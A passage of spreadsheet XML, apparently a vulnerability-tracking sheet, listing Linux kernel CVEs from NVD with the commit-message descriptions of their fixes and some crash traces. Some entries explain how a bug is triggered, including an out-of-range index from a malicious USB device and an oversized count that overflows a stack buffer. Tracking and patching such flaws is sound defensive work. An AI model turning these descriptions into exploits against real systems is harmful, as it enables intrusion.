        </is>
      </c>
    </row>
    <row r="996">
      <c r="A996" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B996" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C996" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93179</t>
        </is>
      </c>
      <c r="D996" s="5" t="inlineStr"/>
      <c r="E996" s="5" t="inlineStr"/>
      <c r="F996" s="5" t="inlineStr"/>
      <c r="G996" s="5" t="inlineStr"/>
      <c r="H996" s="5" t="inlineStr"/>
      <c r="I996" s="5" t="inlineStr"/>
      <c r="J996" s="5" t="inlineStr"/>
      <c r="K996" s="5" t="inlineStr"/>
      <c r="L996" s="5" t="inlineStr"/>
      <c r="M996" s="5" t="inlineStr"/>
      <c r="N996" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O996" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P996" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q996" s="5" t="inlineStr"/>
      <c r="R996" s="5" t="inlineStr"/>
      <c r="S996" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amd/powerplay: fix VoltageObjectInfo zero-stride loop and OOB read
Reject voltage objects whose usSize is smaller than the header or would
advance the cursor past the table end, preventing an infinite loop or
heap OOB read when the VBIOS supplies a malformed VoltageObjectInfo table.</t>
        </is>
      </c>
      <c r="T996" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93179</t>
        </is>
      </c>
    </row>
    <row r="997">
      <c r="A997" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B997" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C997" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93180</t>
        </is>
      </c>
      <c r="D997" s="5" t="inlineStr"/>
      <c r="E997" s="5" t="inlineStr"/>
      <c r="F997" s="5" t="inlineStr"/>
      <c r="G997" s="5" t="inlineStr"/>
      <c r="H997" s="5" t="inlineStr"/>
      <c r="I997" s="5" t="inlineStr"/>
      <c r="J997" s="5" t="inlineStr"/>
      <c r="K997" s="5" t="inlineStr"/>
      <c r="L997" s="5" t="inlineStr"/>
      <c r="M997" s="5" t="inlineStr"/>
      <c r="N997" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O997" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P997" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q997" s="5" t="inlineStr"/>
      <c r="R997" s="5" t="inlineStr"/>
      <c r="S997" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/panthor: Fix NPD issue on partial unmap of an evicted BO
This commit fixes the NULL pointer dereference issue that would have
happened on the split of GPU mapping due to partial unmap of an evicted
BO. There is a logic to handle the partial unmap of huge pages when the
GPU mapping is split. That logic was not being completely skipped for
the VMA of an evicted BO and that resulted in a NPD possibility for the
'bo-&gt;backing.pages' pointer, which is set to NULL when pages of a
BO are released on eviction.
Following dump was seen when a partial unmap was exercised for an
evicted BO.
Unable to handle kernel paging request at virtual address 0000000000002000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pgdp=00000008842e8000
[0000000000002000] pgd=0000000000000000, p4d=0000000000000000
Internal error: Oops: 0000000096000004 [#1]  SMP
&lt;snip&gt;
pstate: 20000005 (nzCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--)
pc : iova_mapped_as_huge_page+0x20/0x68 [panthor]
lr : panthor_gpuva_sm_step_remap+0x39c/0x498 [panthor]
sp : ffff800086193920
x29: ffff800086193920 x28: ffff800086193a18 x27: ffff800086193b80
x26: 0000000000400000 x25: 0000000000810000 x24: 0000000000400000
x23: ffff000808af1800 x22: 0000000000a00000 x21: ffff800086193a00
x20: ffff000806fd3f00 x19: 0000000000410000 x18: 00000000ffffffff
x17: 0000000000000000 x16: 0000000000000000 x15: ffff800083ce2d83
x14: 0000000000000000 x13: 3120646574636976 x12: 6520303030303138
x11: 2d30303030313420 x10: ffff8000836e6c80 x9 : ffff80007bfc889c
x8 : 3fffffffffffefff x7 : ffff8000836e6c80 x6 : 0000000000000000
x5 : ffff00097ef19088 x4 : 0000000000000000 x3 : 0000000000000000
x2 : 0000000000010000 x1 : 0000000000000400 x0 : 0000000000000000
Call trace:
 iova_mapped_as_huge_page+0x20/0x68 [panthor] (P)
 op_remap_cb.isra.0+0x70/0xb0
 __drm_gpuvm_sm_unmap+0xf8/0x1c0
 drm_gpuvm_sm_unmap+0x40/0x60
 panthor_vm_exec_op+0xa0/0x168 [panthor]
 panthor_vm_bind_exec_sync_op+0x8c/0xb8 [panthor]
 panthor_ioctl_vm_bind+0xbc/0x170 [panthor]
 drm_ioctl_kernel+0xc0/0x140
 drm_ioctl+0x20c/0x500
 __arm64_sys_ioctl+0xb4/0x118
 invoke_syscall+0x5c/0x120
 el0_svc_common.constprop.0+0x48/0xf8
 do_el0_svc+0x28/0x40
 el0_svc+0x38/0x128
 el0t_64_sync_handler+0xa0/0xe8
 el0t_64_sync+0x198/0x1a0
Code: 8b030021 cb020021 f940b800 d34cfc21 (f8617801)
---[ end trace 0000000000000000 ]---
v2: Fix indentation</t>
        </is>
      </c>
      <c r="T997" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93180</t>
        </is>
      </c>
    </row>
    <row r="998">
      <c r="A998" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B998" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C998" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93181</t>
        </is>
      </c>
      <c r="D998" s="5" t="inlineStr"/>
      <c r="E998" s="5" t="inlineStr"/>
      <c r="F998" s="5" t="inlineStr"/>
      <c r="G998" s="5" t="inlineStr"/>
      <c r="H998" s="5" t="inlineStr"/>
      <c r="I998" s="5" t="inlineStr"/>
      <c r="J998" s="5" t="inlineStr"/>
      <c r="K998" s="5" t="inlineStr"/>
      <c r="L998" s="5" t="inlineStr"/>
      <c r="M998" s="5" t="inlineStr"/>
      <c r="N998" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O998" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P998" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q998" s="5" t="inlineStr"/>
      <c r="R998" s="5" t="inlineStr"/>
      <c r="S998" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
perf/x86/intel/uncore: Fix uncore_box ref/unref ordering
In uncore_event_cpu_online(), uncore_box_ref() was called before
uncore_change_context().  uncore_box_ref() gates on box-&gt;cpu &gt;= 0,
but box-&gt;cpu is still -1 at that point because uncore_change_context()
has not run yet.  As a result, the box is never initialized on the
first CPU to come online in a die, leaving it permanently
uninitialized in the single-CPU-per-die case.
Thus, box-&gt;refcnt is one count below the true value, and in the CPU
offline path, the box will be torn down on the second-to-last CPU.
In uncore_event_cpu_offline(), uncore_box_unref() was called after
uncore_change_context(), so box-&gt;cpu is already -1 when the collector
CPU goes offline, which prevents it from tearing down the box.
Fix by swapping the call order in both paths so that
uncore_box_{ref,unref}() runs at the point where box-&gt;cpu reflects
the correct context.
Move allocate_boxes() out of uncore_box_ref() to enable this
reordering.</t>
        </is>
      </c>
      <c r="T998" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93181</t>
        </is>
      </c>
    </row>
    <row r="999">
      <c r="A999" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B999" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C999" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93182</t>
        </is>
      </c>
      <c r="D999" s="5" t="inlineStr"/>
      <c r="E999" s="5" t="inlineStr"/>
      <c r="F999" s="5" t="inlineStr"/>
      <c r="G999" s="5" t="inlineStr"/>
      <c r="H999" s="5" t="inlineStr"/>
      <c r="I999" s="5" t="inlineStr"/>
      <c r="J999" s="5" t="inlineStr"/>
      <c r="K999" s="5" t="inlineStr"/>
      <c r="L999" s="5" t="inlineStr"/>
      <c r="M999" s="5" t="inlineStr"/>
      <c r="N999" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O999" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P999" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q999" s="5" t="inlineStr"/>
      <c r="R999" s="5" t="inlineStr"/>
      <c r="S999" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sched/fair: Fix overflow in update_tg_cfs_runnable()
A divide-by-zero crash is observed when running hackbench:
   [14697.488452] CPU: 112 UID: 0 PID: 124791 Comm: hackbench Not tainted 7.1.0-rc2+
   [14697.492627] RIP: 0010:propagate_entity_load_avg+0x35f/0x3e0
   [14697.506799]  &lt;TASK&gt;
   [14697.507411]  __dequeue_task+0x2b4/0xc70
   [14697.508677]  dequeue_task_fair+0x36/0x370
   [14697.509047]  dequeue_task+0x101/0x2f0
   [14697.509426]  __schedule+0x1b1/0x1a00
   [14697.510868]  anon_pipe_read+0x3da/0x450
   [14697.511400]  vfs_read+0x361/0x390
   [14697.512053]  __x64_sys_read+0x19/0x30
The divide-by-zero happens here:
  if (scale_load_down(gcfs_rq-&gt;load.weight)) {
           load_sum = div_u64(gcfs_rq-&gt;avg.load_sum,
                              scale_load_down(gcfs_rq-&gt;load.weight));
  }
gcfs_rq-&gt;load.weight is an insane large value and is truncated
to the lower 32 bits by div_u64, which happen to be 0.
Using AI for investigation, the cause is a u32 overflow in
update_tg_cfs_runnable(), and flat pickup became a victim when using
tg_tasks():
   u32 new_sum, divider;
   ...
   new_sum = se-&gt;avg.runnable_avg * divider; &lt;-- boom
The following sequence shows how this triggers the crash:
   propagate_entity_load_avg()
     update_tg_cfs_runnable()     # u32 overflow corrupts runnable_sum
   __update_load_avg_cfs_rq()
     ___update_load_avg()         # computes insane runnable_avg
   update_tg_load_avg()           # propagates to tg-&gt;runnable_avg
   update_cfs_group()
     calc_concur_shares()
       tg_tasks()                 # long-to-int truncation, negative nr
     reweight_entity()            # corrupted se-&gt;load.weight
       update_load_add()          # corrupted cfs_rq-&gt;load.weight
   propagate_entity_load_avg()
     update_tg_cfs_load()
       div_u64()                  # divide-by-zero
Fix by widening new_sum from u32 to u64 (no need to force tg_tasks()
to return unsigned long after this fix)</t>
        </is>
      </c>
      <c r="T999" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93182</t>
        </is>
      </c>
    </row>
    <row r="1000">
      <c r="A1000" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1000" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1000" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93183</t>
        </is>
      </c>
      <c r="D1000" s="5" t="inlineStr"/>
      <c r="E1000" s="5" t="inlineStr"/>
      <c r="F1000" s="5" t="inlineStr"/>
      <c r="G1000" s="5" t="inlineStr"/>
      <c r="H1000" s="5" t="inlineStr"/>
      <c r="I1000" s="5" t="inlineStr"/>
      <c r="J1000" s="5" t="inlineStr"/>
      <c r="K1000" s="5" t="inlineStr"/>
      <c r="L1000" s="5" t="inlineStr"/>
      <c r="M1000" s="5" t="inlineStr"/>
      <c r="N1000" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1000" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1000" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1000" s="5" t="inlineStr"/>
      <c r="R1000" s="5" t="inlineStr"/>
      <c r="S1000" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/lima: call drm_mm_init() with a valid allocation range
lima_vm_create() is currently run before va_start and va_end are set up,
meaning they are both 0. lima_vm_create() runs drm_mm_init() with them
as arguments for the allocator, and if DRM_DEBUG_MM is enabled the
DRM_MM_BUG_ON check in drm_mm_init then fires, as seen here on
exynos4412-odroid-u2:
[    1.736297] ------------[ cut here ]------------
[    1.740370] kernel BUG at drivers/gpu/drm/drm_mm.c:931!
[    1.745574] Internal error: Oops - BUG: 0 [#1] SMP ARM
[    1.750697] Modules linked in:
[    1.753734] CPU: 0 UID: 0 PID: 41 Comm: kworker/u16:1 Not tainted 7.0.10-postmarketos-exynos4 #11 PREEMPT
[    1.763372] Hardware name: Samsung Exynos (Flattened Device Tree)
[    1.769446] Workqueue: events_unbound deferred_probe_work_func
[    1.775261] PC is at drm_mm_init+0x9c/0xa4
[    1.779339] LR is at lima_vm_create+0x144/0x17c
[ ... ]
Fix the issue by moving the lima_vm_create() call after va_start and
va_end are set up.</t>
        </is>
      </c>
      <c r="T1000" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93183</t>
        </is>
      </c>
    </row>
    <row r="1001">
      <c r="A1001" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1001" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1001" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93184</t>
        </is>
      </c>
      <c r="D1001" s="5" t="inlineStr"/>
      <c r="E1001" s="5" t="inlineStr"/>
      <c r="F1001" s="5" t="inlineStr"/>
      <c r="G1001" s="5" t="inlineStr"/>
      <c r="H1001" s="5" t="inlineStr"/>
      <c r="I1001" s="5" t="inlineStr"/>
      <c r="J1001" s="5" t="inlineStr"/>
      <c r="K1001" s="5" t="inlineStr"/>
      <c r="L1001" s="5" t="inlineStr"/>
      <c r="M1001" s="5" t="inlineStr"/>
      <c r="N1001" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1001" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1001" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1001" s="5" t="inlineStr"/>
      <c r="R1001" s="5" t="inlineStr"/>
      <c r="S1001" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: fsl_audmix: rework runtime PM handling in probe
After pm_runtime_enable() the AUDMIX block is powered off and stays
suspended until the first runtime resume. Register writes issued between
probe() and the first resume (e.g. from DAPM or ALSA control paths)
target unpowered hardware and cause a system hang.
Fix this by calling pm_runtime_resume_and_get() immediately after
pm_runtime_enable() to power the hardware up and enable its clocks.
Release the reference afterwards with pm_runtime_put() to allow the
runtime PM framework to suspend the device and switch the regmap to
cache-only mode when idle.
When CONFIG_PM is disabled or runtime PM is not enabled, pm_runtime_*
calls are stubs that do not power up the hardware. Handle this case
explicitly by calling fsl_audmix_runtime_resume() directly so the
hardware is always initialised and its clocks are enabled, ensuring
register accesses succeed regardless of PM configuration.</t>
        </is>
      </c>
      <c r="T1001" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93184</t>
        </is>
      </c>
    </row>
    <row r="1002">
      <c r="A1002" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1002" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1002" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93185</t>
        </is>
      </c>
      <c r="D1002" s="5" t="inlineStr"/>
      <c r="E1002" s="5" t="inlineStr"/>
      <c r="F1002" s="5" t="inlineStr"/>
      <c r="G1002" s="5" t="inlineStr"/>
      <c r="H1002" s="5" t="inlineStr"/>
      <c r="I1002" s="5" t="inlineStr"/>
      <c r="J1002" s="5" t="inlineStr"/>
      <c r="K1002" s="5" t="inlineStr"/>
      <c r="L1002" s="5" t="inlineStr"/>
      <c r="M1002" s="5" t="inlineStr"/>
      <c r="N1002" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1002" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1002" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1002" s="5" t="inlineStr"/>
      <c r="R1002" s="5" t="inlineStr"/>
      <c r="S1002" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: rt700-sdw: always drain jack work on remove
rt700_sdw_remove() drains jack_detect_work and jack_btn_check_work only
when rt700-&gt;hw_init is true. That state bit is cleared by
rt700_update_status() when the SoundWire slave becomes UNATTACHED, but a
jack work item can already have been queued by rt700_interrupt_callback()
or rt700_jack_init() while the device was initialized.
Do not use hw_init as the remove-time guard for draining these work
objects. The delayed works are initialized during rt700_init(), so remove
can cancel them unconditionally and pair the object lifetime with the
codec-private data lifetime instead of a mutable hardware state bit.
This issue was found by our static analysis tool and then confirmed by
manual review of the SoundWire status, interrupt and remove paths. The
remove path should drain work based on whether the work object exists, not
on a runtime hardware state bit that can change after the work was queued.
A QEMU PoC queued jack_detect_work, simulated SDW_SLAVE_UNATTACHED, and
then entered remove. DEBUG_OBJECTS reported an active timer/work object
associated with the rt700 jack work path after remove skipped the cancel.
This is sent as an RFC because the practical trigger depends on SoundWire
core remove ordering after an UNATTACHED status update. If remove cannot
run after hw_init has been cleared while jack work is still pending, this
is a defensive lifecycle cleanup rather than a reachable race on current
systems.</t>
        </is>
      </c>
      <c r="T1002" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93185</t>
        </is>
      </c>
    </row>
    <row r="1003">
      <c r="A1003" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1003" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1003" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93186</t>
        </is>
      </c>
      <c r="D1003" s="5" t="inlineStr"/>
      <c r="E1003" s="5" t="inlineStr"/>
      <c r="F1003" s="5" t="inlineStr"/>
      <c r="G1003" s="5" t="inlineStr"/>
      <c r="H1003" s="5" t="inlineStr"/>
      <c r="I1003" s="5" t="inlineStr"/>
      <c r="J1003" s="5" t="inlineStr"/>
      <c r="K1003" s="5" t="inlineStr"/>
      <c r="L1003" s="5" t="inlineStr"/>
      <c r="M1003" s="5" t="inlineStr"/>
      <c r="N1003" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1003" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1003" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1003" s="5" t="inlineStr"/>
      <c r="R1003" s="5" t="inlineStr"/>
      <c r="S1003" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cxl/mbox: Clamp mailbox output allocation to the payload size
CXL_MEM_SEND_COMMAND bounds the user's in.size to the mailbox payload
size but leaves out.size unbounded, then cxl_mbox_cmd_ctor() calls
kvzalloc(out.size). A large out.size drives a huge allocation, above
INT_MAX it WARNs and taints, and with panic_on_warn=1 it panics.
The transport __cxl_pci_mbox_send_cmd() already clamps the response copy
to min(out.size, payload_size, device len), so the output buffer is
never written beyond payload_size. Clamp the allocation to payload_size
too, matching the RAW path.</t>
        </is>
      </c>
      <c r="T1003" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93186</t>
        </is>
      </c>
    </row>
    <row r="1004">
      <c r="A1004" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1004" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1004" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93187</t>
        </is>
      </c>
      <c r="D1004" s="5" t="inlineStr"/>
      <c r="E1004" s="5" t="inlineStr"/>
      <c r="F1004" s="5" t="inlineStr"/>
      <c r="G1004" s="5" t="inlineStr"/>
      <c r="H1004" s="5" t="inlineStr"/>
      <c r="I1004" s="5" t="inlineStr"/>
      <c r="J1004" s="5" t="inlineStr"/>
      <c r="K1004" s="5" t="inlineStr"/>
      <c r="L1004" s="5" t="inlineStr"/>
      <c r="M1004" s="5" t="inlineStr"/>
      <c r="N1004" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1004" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1004" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1004" s="5" t="inlineStr"/>
      <c r="R1004" s="5" t="inlineStr"/>
      <c r="S1004" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: SOF: ipc4-topology: Return error for invalid number of formats
When the number of input or output formats is zero,
sof_ipc4_widget_setup_comp_src() and sof_ipc4_widget_setup_comp_asrc()
print an error and jump to the cleanup label. At that point 'ret' is
still 0, because the earlier sof_ipc4_get_audio_fmt() call succeeded, so
the function returns success and the caller never finds out that the
widget setup actually failed.
Set ret to -EINVAL before the goto so the error gets reported.</t>
        </is>
      </c>
      <c r="T1004" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93187</t>
        </is>
      </c>
    </row>
    <row r="1005">
      <c r="A1005" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1005" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1005" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93188</t>
        </is>
      </c>
      <c r="D1005" s="5" t="inlineStr"/>
      <c r="E1005" s="5" t="inlineStr"/>
      <c r="F1005" s="5" t="inlineStr"/>
      <c r="G1005" s="5" t="inlineStr"/>
      <c r="H1005" s="5" t="inlineStr"/>
      <c r="I1005" s="5" t="inlineStr"/>
      <c r="J1005" s="5" t="inlineStr"/>
      <c r="K1005" s="5" t="inlineStr"/>
      <c r="L1005" s="5" t="inlineStr"/>
      <c r="M1005" s="5" t="inlineStr"/>
      <c r="N1005" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1005" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1005" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1005" s="5" t="inlineStr"/>
      <c r="R1005" s="5" t="inlineStr"/>
      <c r="S1005" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: roccat: bound device-supplied profile index
kone_keep_values_up_to_date() and kone_profile_activated() use an
8-bit, device-supplied profile value as an index into the 5-element
kone-&gt;profiles[] array without a range check. A malicious USB device
claiming the Roccat Kone id can send a switch-profile event (or a
startup_profile read at probe) with an out-of-range value and make the
driver read out of bounds; the result is exposed via the actual_dpi
sysfs attribute.
Reject out-of-range indices in both paths.
This was found with static analysis and confirmed with the KUnit test
added in the following patch (KASAN: slab-out-of-bounds).</t>
        </is>
      </c>
      <c r="T1005" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93188</t>
        </is>
      </c>
    </row>
    <row r="1006">
      <c r="A1006" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1006" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1006" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93189</t>
        </is>
      </c>
      <c r="D1006" s="5" t="inlineStr"/>
      <c r="E1006" s="5" t="inlineStr"/>
      <c r="F1006" s="5" t="inlineStr"/>
      <c r="G1006" s="5" t="inlineStr"/>
      <c r="H1006" s="5" t="inlineStr"/>
      <c r="I1006" s="5" t="inlineStr"/>
      <c r="J1006" s="5" t="inlineStr"/>
      <c r="K1006" s="5" t="inlineStr"/>
      <c r="L1006" s="5" t="inlineStr"/>
      <c r="M1006" s="5" t="inlineStr"/>
      <c r="N1006" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1006" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1006" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1006" s="5" t="inlineStr"/>
      <c r="R1006" s="5" t="inlineStr"/>
      <c r="S1006" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: core: quiesce input in hid_hw_stop() to prevent use-after-free
A driver's probe calls hid_device_io_start() to enable input delivery,
then fails at a later initialization step and unwinds via hid_hw_stop().
The unwind frees struct hidraw via hidraw_disconnect() while in-flight
HID reports may still be running on another CPU, dereferencing the
freed object through hidraw_report_event(). syzbot reports the
resulting use-after-free for the corsair-psu HID driver.
Edward Adam Davis posted a per-driver fix for corsair-psu that adds
an explicit hid_device_io_stop() before hid_hw_stop() in the probe
error path ("hwmon: prevent packets from going to driver for probe",
2026-04-28). Auditing the tree shows 15 drivers call
hid_device_io_start(); 7 also call hid_device_io_stop() and 8 do not:
  drivers calling hid_device_io_start() without a matching
  hid_device_io_stop() before hid_hw_stop():
    drivers/hwmon/corsair-psu.c       (fix posted by Edward)
    drivers/hwmon/corsair-cpro.c
    drivers/hwmon/nzxt-kraken3.c
    drivers/hwmon/nzxt-smart2.c
    drivers/hwmon/gigabyte_waterforce.c
    drivers/hid/hid-logitech-dj.c
    drivers/hid/hid-nintendo.c
    drivers/hid/hid-mcp2221.c
Roughly half of all callers of the API are exposed. Centralize the
quiesce in hid_hw_stop() so callers do not have to remember the
matching stop: if a driver has left hdev-&gt;io_started true on entry,
call hid_device_io_stop() before hid_disconnect().
For the 7 drivers that already call hid_device_io_stop() correctly,
hdev-&gt;io_started is false on entry, the guard short-circuits, and
behavior is unchanged.
No Fixes: tag because the affected drivers gained their
hid_device_io_start() calls independently over years; the bug is a
class-wide API misuse rather than a regression from one commit.</t>
        </is>
      </c>
      <c r="T1006" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93189</t>
        </is>
      </c>
    </row>
    <row r="1007">
      <c r="A1007" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1007" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1007" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93190</t>
        </is>
      </c>
      <c r="D1007" s="5" t="inlineStr"/>
      <c r="E1007" s="5" t="inlineStr"/>
      <c r="F1007" s="5" t="inlineStr"/>
      <c r="G1007" s="5" t="inlineStr"/>
      <c r="H1007" s="5" t="inlineStr"/>
      <c r="I1007" s="5" t="inlineStr"/>
      <c r="J1007" s="5" t="inlineStr"/>
      <c r="K1007" s="5" t="inlineStr"/>
      <c r="L1007" s="5" t="inlineStr"/>
      <c r="M1007" s="5" t="inlineStr"/>
      <c r="N1007" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1007" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P1007" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1007" s="5" t="inlineStr"/>
      <c r="R1007" s="5" t="inlineStr"/>
      <c r="S1007" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/chrome: cros_ec_typec: Reject out-of-bounds PD cap count
cros_typec_register_partner_pdos() copies the partner PDOs from the EC
TYPEC_STATUS response into the fixed caps_desc.pdo[PDO_MAX_OBJECTS] array.
	memcpy(caps_desc.pdo, resp-&gt;source_cap_pdos,
	       sizeof(u32) * resp-&gt;source_cap_count);
	...
	memcpy(caps_desc.pdo, resp-&gt;sink_cap_pdos,
	       sizeof(u32) * resp-&gt;sink_cap_count);
PDO_MAX_OBJECTS is 7. source_cap_count and sink_cap_count are u8 fields
from the EC. The only check is that they are not both zero. If either is
larger than 7, the memcpy writes past the end of the array on the stack.
A count of 255 overflows it by about 1 KB. The EC source arrays are only
seven entries wide. A larger count reads past them too.
The ChromeOS EC firmware caps these counts today, so a compliant setup
does not hit this. The kernel should still validate these values rather
than trust them.
Validate the counts in cros_typec_register_partner_pdos() next to the
memcpy. Skip the PDO registration if either count is above PDO_MAX_OBJECTS.
The rest of cros_typec_handle_status() still runs so events are handled
and cleared.</t>
        </is>
      </c>
      <c r="T1007" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93190</t>
        </is>
      </c>
    </row>
    <row r="1008">
      <c r="A1008" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
